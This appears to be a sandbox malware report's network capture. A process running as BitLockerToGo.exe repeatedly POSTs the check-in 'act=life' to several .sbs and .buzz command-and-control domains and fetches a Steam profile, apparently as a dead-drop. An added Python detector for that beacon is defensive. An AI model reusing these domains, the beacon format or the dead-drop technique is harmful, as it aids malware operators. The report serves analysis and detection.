Oct 13, 2024 01:44:15.782776117 CEST | 1.1.1.1 | 192.168.2.5 | 0x2b20 | No error (0) | resinedyw.sbs | | 104.21.77.78 | A (IP address) | IN (0x0001) | false
Oct 13, 2024 01:44:17.544902086 CEST | 1.1.1.1 | 192.168.2.5 | 0x3305 | No error (0) | vennurviot.sbs | | 172.67.140.193 | A (IP address) | IN (0x0001) | false
Oct 13, 2024 01:44:17.544902086 CEST | 1.1.1.1 | 192.168.2.5 | 0x3305 | No error (0) | vennurviot.sbs | | 104.21.46.170 | A (IP address) | IN (0x0001) | false
Oct 13, 2024 01:44:19.575234890 CEST | 1.1.1.1 | 192.168.2.5 | 0xa658 | No error (0) | ehticsprocw.sbs | | 172.67.173.224 | A (IP address) | IN (0x0001) | false
Oct 13, 2024 01:44:19.575234890 CEST | 1.1.1.1 | 192.168.2.5 | 0xa658 | No error (0) | ehticsprocw.sbs | | 104.21.30.221 | A (IP address) | IN (0x0001) | false
Oct 13, 2024 01:44:20.535840988 CEST | 1.1.1.1 | 192.168.2.5 | 0x4d3f | No error (0) | condifendteu.sbs | | 104.21.79.35 | A (IP address) | IN (0x0001) | false
Oct 13, 2024 01:44:20.535840988 CEST | 1.1.1.1 | 192.168.2.5 | 0x4d3f | No error (0) | condifendteu.sbs | | 172.67.141.136 | A (IP address) | IN (0x0001) | false
Oct 13, 2024 01:44:21.483051062 CEST | 1.1.1.1 | 192.168.2.5 | 0xccdb | No error (0) | drawwyobstacw.sbs | | 188.114.96.3 | A (IP address) | IN (0x0001) | false
Oct 13, 2024 01:44:21.483051062 CEST | 1.1.1.1 | 192.168.2.5 | 0xccdb | No error (0) | drawwyobstacw.sbs | | 188.114.97.3 | A (IP address) | IN (0x0001) | false
Oct 13, 2024 01:44:22.329580069 CEST | 1.1.1.1 | 192.168.2.5 | 0x47b9 | No error (0) | steamcommunity.com | | 104.102.49.254 | A (IP address) | IN (0x0001) | false
Oct 13, 2024 01:44:23.737500906 CEST | 1.1.1.1 | 192.168.2.5 | 0x8468 | No error (0) | sergei-esenin.com | | 104.21.53.8 | A (IP address) | IN (0x0001) | false
Oct 13, 2024 01:44:23.737500906 CEST | 1.1.1.1 | 192.168.2.5 | 0x8468 | No error (0) | sergei-esenin.com | | 172.67.206.204 | A (IP address) | IN (0x0001) | false
• proclaimykn.buzz
• mathcucom.sbs
• enlargkiw.sbs
• resinedyw.sbs
• vennurviot.sbs
• ehticsprocw.sbs
• condifendteu.sbs
• drawwyobstacw.sbs
• steamcommunity.com
• sergei-esenin.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49704 | 188.114.96.3 | 443 | 3748 | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-12 23:44:13 UTC | 263 | OUT | POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 8
    Host: proclaimykn.buzz
2024-10-12 23:44:13 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
    Data Ascii: act=life
2024-10-12 23:44:13 UTC | 817 | IN | HTTP/1.1 200 OK
    Date: Sat, 12 Oct 2024 23:44:13 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: PHPSESSID=6fcsqpd4d9rdqgrb461tvhoem9; expires=Wed, 05 Feb 2025 17:30:52 GMT; Max-Age=9999999; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    cf-cache-status: DYNAMIC
    vary: accept-encoding
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Xw0R0OqMHTdGDa0HarxyVZ3lOXhvzbcC44o32TQjn2DJZUEEpTN%2BarjSQ7lcHVEokisjfKoqE%2FXT0TSW2Ict1PReHeFBLve4xIDJzupZxPMwLPCv7o46N7O2JitpPWk2UJPo"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8d1af4e3dc9419c7-EWR
    alt-svc: h3=":443"; ma=86400
2024-10-12 23:44:13 UTC | 15 | IN | Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
    Data Ascii: a\r\nerror #D12\r\n (chunked encoding: chunk size 0xa, then the 10-byte chunk "error #D12")
2024-10-12 23:44:13 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0\r\n\r\n (zero-length last chunk; the decoded body is just "error #D12")


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49705 | 188.114.96.3 | 443 | 3748 | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-12 23:44:14 UTC | 260 | OUT | POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 8
    Host: mathcucom.sbs
2024-10-12 23:44:14 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
    Data Ascii: act=life
2024-10-12 23:44:14 UTC | 819 | IN | HTTP/1.1 200 OK
    Date: Sat, 12 Oct 2024 23:44:14 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: PHPSESSID=jh2lb8s10c86u20ja9mi4e2ur4; expires=Wed, 05 Feb 2025 17:30:53 GMT; Max-Age=9999999; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    cf-cache-status: DYNAMIC
    vary: accept-encoding
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FtmRopq45wqNROzYN2KcuoX4N21oqffJ53Hf3MEgdMTEhuv89rxmj0yneQua8X3O5SnIgx0oJfDL%2FArfcKnDth36YU%2BOOJDZDqNmIK6kO5W0%2BWpl7K%2F4mFIlGBDNada8"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8d1af4ea3f0d4380-EWR
    alt-svc: h3=":443"; ma=86400
2024-10-12 23:44:14 UTC | 15 | IN | Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
    Data Ascii: a\r\nerror #D12\r\n
2024-10-12 23:44:14 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0\r\n\r\n
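The two sessions above show the same exchange against two different hosts: an HTTP POST to /api carrying the 8-byte form body act=life, answered with a chunked body that decodes to "error #D12". The following is an added example, not code from the Joe Sandbox report or from the sample: it parses a request of that shape, decodes the chunked reply exactly as captured, and runs a detector over a small set of records. The captured request and response bytes are hand-copied from session 0; the record tuple format, the benign request with a different 8-byte body, and the unlisted host c2-not-in-report.example are constructed for the example.

```python
"""Decode and detect the act=life check-in seen in the sandbox capture.

Added example; the constants are copied from session 0 of the report, the
record format and the negative cases are constructed here.
"""
from typing import Any, Dict, List, Tuple

# Request as captured in session 0 (proclaimykn.buzz).
CAPTURED_REQUEST = (
    b"POST /api HTTP/1.1\r\n"
    b"Connection: Keep-Alive\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n"
    b"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
    b"(KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36\r\n"
    b"Content-Length: 8\r\n"
    b"Host: proclaimykn.buzz\r\n"
    b"\r\n"
    b"act=life"
)

# Response body as captured: chunk "a\r\n<10 bytes>\r\n" then the last chunk "0\r\n\r\n".
CAPTURED_CHUNKS = bytes.fromhex(
    "61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a " "30 0d 0a 0d 0a"
)

# Domains resolved back-to-back in the report's DNS table (used only for tagging hits).
C2_CANDIDATES = [
    "proclaimykn.buzz", "mathcucom.sbs", "allocatinow.sbs", "enlargkiw.sbs",
    "resinedyw.sbs", "vennurviot.sbs", "ehticsprocw.sbs", "condifendteu.sbs",
    "drawwyobstacw.sbs",
]

CHECKIN_BODY = b"act=life"


def parse_request(raw: bytes) -> Dict[str, Any]:
    """Split an HTTP/1.1 request into request line, lower-cased header map and body."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    method, target, version = lines[0].decode("ascii").split(" ", 2)
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.decode("latin-1").partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "target": target, "version": version,
            "headers": headers, "body": body}


def dechunk(data: bytes) -> bytes:
    """Decode a chunked transfer-encoded body; chunk extensions and trailers are
    ignored, and a truncated body raises ValueError from the CRLF search."""
    out = bytearray()
    pos = 0
    while True:
        eol = data.index(b"\r\n", pos)
        size = int(data[pos:eol].split(b";")[0].strip(), 16)  # hex size, drop ";ext"
        pos = eol + 2
        if size == 0:
            return bytes(out)          # last chunk reached
        out += data[pos:pos + size]
        pos += size + 2                # skip the chunk and its trailing CRLF


def is_checkin(req: Dict[str, Any]) -> bool:
    """True for the exact shape captured above. Path, user agent and content type
    are generic; the 8-byte body act=life is what carries the signal."""
    h = req["headers"]
    return (req["method"] == "POST"
            and req["target"] == "/api"
            and h.get("content-type", "").startswith("application/x-www-form-urlencoded")
            and h.get("content-length") == str(len(CHECKIN_BODY))
            and req["body"] == CHECKIN_BODY)


def find_checkins(records: List[Tuple[str, bytes]]) -> List[Tuple[str, bool]]:
    """records are (destination IP, raw request) tuples, a format constructed for
    this example. Returns (Host header, host is in C2_CANDIDATES) for each hit."""
    hits: List[Tuple[str, bool]] = []
    for _dst, raw in records:
        req = parse_request(raw)
        if is_checkin(req):
            host = req["headers"].get("host", "")
            hits.append((host, host in C2_CANDIDATES))
    return hits


def _with_host(host: str) -> bytes:
    return CAPTURED_REQUEST.replace(b"Host: proclaimykn.buzz", b"Host: " + host.encode())


# Constructed sample: the two captured sessions plus two negative/unlisted cases.
SAMPLE_RECORDS = [
    ("188.114.96.3", CAPTURED_REQUEST),                                    # session 0
    ("188.114.96.3", _with_host("mathcucom.sbs")),                         # session 1
    ("203.0.113.7", CAPTURED_REQUEST.replace(b"act=life", b"id=12345")),  # same headers, other 8-byte body
    ("203.0.113.8", _with_host("c2-not-in-report.example")),              # same beacon, host not in the report
]

if __name__ == "__main__":
    print(dechunk(CAPTURED_CHUNKS))    # b'error #D12'
    print(find_checkins(SAMPLE_RECORDS))
```

The detector deliberately does not key on the destination address: every host in the capture sits behind Cloudflare (188.114.96.0/24, 104.21.0.0/16, 172.67.0.0/16 ranges), so IP-based matching would be noisy; the body, its fixed length and the Host header are the useful fields, and the third record shows why a looser match on POST /api alone would misfire.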


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.5 | 49707 | 172.67.152.13 | 443 | 3748 | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-12 23:44:15 UTC | 260 | OUT | POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 8
    Host: enlargkiw.sbs
2024-10-12 23:44:15 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
    Data Ascii: act=life
2024-10-12 23:44:15 UTC | 815 | IN | HTTP/1.1 200 OK
    Date: Sat, 12 Oct 2024 23:44:15 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: PHPSESSID=2psr2lmo5nacf89lvqueonehb0; expires=Wed, 05 Feb 2025 17:30:54 GMT; Max-Age=9999999; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    cf-cache-status: DYNAMIC
    vary: accept-encoding
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cmsqL76du4C2sxY6mevfaFtBjT14bLbpNR6DgRjeUShRPVyhWCa7%2BvxWhFpeSkahyGBPSL0A%2FQIlhIOr57WORZqutPW6884XfMAjbZDo9zU9jhHvesL4%2B5Tm6aAfPBgS"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8d1af4f04c5d4285-EWR
    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                      2024-10-12 23:44:15 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                                                                                                                                                      Data Ascii: aerror #D12
                                                                                                                                                                                      2024-10-12 23:44:15 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                      Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.5 | 49710 | 172.67.205.156 | 443 | 3748 | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-12 23:44:17 UTC | 260 | OUT | POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 8
    Host: resinedyw.sbs
2024-10-12 23:44:17 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
    Data Ascii: act=life
2024-10-12 23:44:17 UTC | 813 | IN | HTTP/1.1 200 OK
    Date: Sat, 12 Oct 2024 23:44:17 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: PHPSESSID=k8tjbnlsg70otfoo8g5d8s9g67; expires=Wed, 05 Feb 2025 17:30:56 GMT; Max-Age=9999999; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    cf-cache-status: DYNAMIC
    vary: accept-encoding
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5wb3GisecAltVPVVxMOXYK3nhyHDKVFaGVaPnD1%2FAbAliiFaEa%2FfoyeGRj5Y0RQ7EaWZSZqlfUlk6MJZe65wFh0QqIMFyPkpPaUvvZEnerPpvcXFc0YRjHxReYr0vYcV"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8d1af4fb49894400-EWR
    alt-svc: h3=":443"; ma=86400
2024-10-12 23:44:17 UTC | 15 | IN | Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
    Data Ascii: aerror #D12
2024-10-12 23:44:17 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.5 | 49714 | 172.67.140.193 | 443 | 3748 | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-12 23:44:18 UTC | 261 | OUT | POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 8
    Host: vennurviot.sbs
2024-10-12 23:44:18 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
    Data Ascii: act=life
2024-10-12 23:44:19 UTC | 825 | IN | HTTP/1.1 200 OK
    Date: Sat, 12 Oct 2024 23:44:19 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: PHPSESSID=8a488v2046d22c2fhq1fgb770g; expires=Wed, 05 Feb 2025 17:30:58 GMT; Max-Age=9999999; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    cf-cache-status: DYNAMIC
    vary: accept-encoding
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TNtlTqVo8tA14JrkcD8cT3yEV6efwWJ7%2F0Jxp6h5dGW%2FQ63UOLshtmlqqjZ2kcz4PiQBIsU9V1VhJs5qTmSez%2Fvhh3f6IbpfenQ2tm9S4xPdPlNeKjEbP6GgpjjL584l%2FA%3D%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8d1af5015be78ce0-EWR
    alt-svc: h3=":443"; ma=86400
2024-10-12 23:44:19 UTC | 15 | IN | Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
    Data Ascii: aerror #D12
2024-10-12 23:44:19 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.5 | 49724 | 172.67.173.224 | 443 | 3748 | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-12 23:44:20 UTC | 262 | OUT | POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 8
    Host: ehticsprocw.sbs
2024-10-12 23:44:20 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
    Data Ascii: act=life
2024-10-12 23:44:20 UTC | 823 | IN | HTTP/1.1 200 OK
    Date: Sat, 12 Oct 2024 23:44:20 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: PHPSESSID=jea3ft6rf81fa51am1is2i4umk; expires=Wed, 05 Feb 2025 17:30:59 GMT; Max-Age=9999999; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    cf-cache-status: DYNAMIC
    vary: accept-encoding
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IC7%2BviqM5IQG5gmiErVQkyQiA7VfnfruaY%2FogG2fu4u0fKIq0FTDyNaqxAOkGZVu1mE4s8%2BqJWaB7JV7aUSixiKU0JxULwUk8Boct4bg7kwFsFZ6y4wfC4%2BjbQd3F5BUi3E%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8d1af50dd84d4314-EWR
    alt-svc: h3=":443"; ma=86400
2024-10-12 23:44:20 UTC | 15 | IN | Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
    Data Ascii: aerror #D12
2024-10-12 23:44:20 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.5 | 49729 | 104.21.79.35 | 443 | 3748 | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-12 23:44:21 UTC | 263 | OUT | POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 8
    Host: condifendteu.sbs
2024-10-12 23:44:21 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
    Data Ascii: act=life
2024-10-12 23:44:21 UTC | 813 | IN | HTTP/1.1 200 OK
    Date: Sat, 12 Oct 2024 23:44:21 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: PHPSESSID=n62v8a5hlnljpnaf975ga4cmgs; expires=Wed, 05 Feb 2025 17:31:00 GMT; Max-Age=9999999; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    cf-cache-status: DYNAMIC
    vary: accept-encoding
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=H1ccwxnEOyd0b8SNc8fZEusdsrK1AVSD6tLcrffEiFeW4VKdZYyjDqcDn5QrnryoEkRHkkN9qIHCC0M5wdNV3hefT8mp9j6IMalcY2yXfk3l8Cio988hH9SJ2RAMJiAvv4BI"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8d1af513c8ee4357-EWR
    alt-svc: h3=":443"; ma=86400
2024-10-12 23:44:21 UTC | 15 | IN | Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
    Data Ascii: aerror #D12
2024-10-12 23:44:21 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.5 | 49738 | 188.114.96.3 | 443 | 3748 | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-12 23:44:21 UTC | 264 | OUT | POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 8
    Host: drawwyobstacw.sbs
2024-10-12 23:44:21 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
    Data Ascii: act=life
2024-10-12 23:44:22 UTC | 827 | IN | HTTP/1.1 200 OK
    Date: Sat, 12 Oct 2024 23:44:22 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: PHPSESSID=v4318581urnhjdcp4v97fslub6; expires=Wed, 05 Feb 2025 17:31:01 GMT; Max-Age=9999999; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    cf-cache-status: DYNAMIC
    vary: accept-encoding
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Jv1bj2l3GE%2BRr9vjKR470rnQfxFN2LQ9JiKB6snOWbBy4nCYeONK2DqU0F6mw4116P1NEd7Q0yUogOxRH8Zycq%2FW4WoUmOrE%2ByGa3tZq5632QkPzYhDTj1NSkEp0NdPDnzx5aA%3D%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8d1af519de8d41d8-EWR
    alt-svc: h3=":443"; ma=86400
2024-10-12 23:44:22 UTC | 15 | IN | Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
    Data Ascii: aerror #D12
2024-10-12 23:44:22 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.5 | 49744 | 104.102.49.254 | 443 | 3748 | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-12 23:44:23 UTC | 219 | OUT | GET /profiles/76561199724331900 HTTP/1.1
    Connection: Keep-Alive
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Host: steamcommunity.com
2024-10-12 23:44:23 UTC | 1870 | IN | HTTP/1.1 200 OK
    Server: nginx
    Content-Type: text/html; charset=UTF-8
    Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
    Expires: Mon, 26 Jul 1997 05:00:00 GMT
    Cache-Control: no-cache
    Date: Sat, 12 Oct 2024 23:44:23 GMT
    Content-Length: 34837
    Connection: close
    Set-Cookie: sessionid=76c06806112d4b2913c8cd51; Path=/; Secure; SameSite=None
    Set-Cookie: steamCountry=US%7Cd7fb65801182a5f50a3169fe2a0b7ef0; Path=/; Secure; HttpOnly; SameSite=None
2024-10-12 23:44:23 UTC | 14514 | IN | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c
    Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
2024-10-12 23:44:23 UTC | 16384 | IN | Data Raw: 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0d 0a 09 09 6a 51 75 65 72 79 28 66 75 6e 63 74 69 6f 6e 28 24 29 20 7b 0d 0a 09 09 09 24 28 27 23 67 6c 6f 62 61 6c 5f 68 65 61 64 65 72 20 2e 73 75 70 65 72 6e 61 76 27 29 2e 76 5f 74 6f 6f 6c 74 69 70 28 7b 27 6c 6f 63 61 74 69 6f 6e 27 3a 27 62 6f 74 74 6f 6d 27 2c 20 27 64 65 73 74 72 6f 79 57 68 65 6e 44 6f 6e 65 27 3a 20 66 61 6c 73 65 2c 20 27 74 6f 6f 6c 74 69 70 43 6c 61 73 73 27 3a 20 27 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 65 6e 74 27 2c 20 27 6f 66 66 73 65 74 59 27 3a 2d 36 2c 20 27 6f 66 66 73 65 74 58 27 3a 20 31 2c 20 27 68 6f 72 69 7a 6f 6e 74 61 6c 53 6e 61 70 27 3a 20 34 2c 20 27 74 6f 6f 6c 74 69 70 50 61 72 65 6e 74 27 3a 20 27 23 67 6c 6f
    Data Ascii: <script type="text/javascript">jQuery(function($) {$('#global_header .supernav').v_tooltip({'location':'bottom', 'destroyWhenDone': false, 'tooltipClass': 'supernav_content', 'offsetY':-6, 'offsetX': 1, 'horizontalSnap': 4, 'tooltipParent': '#glo
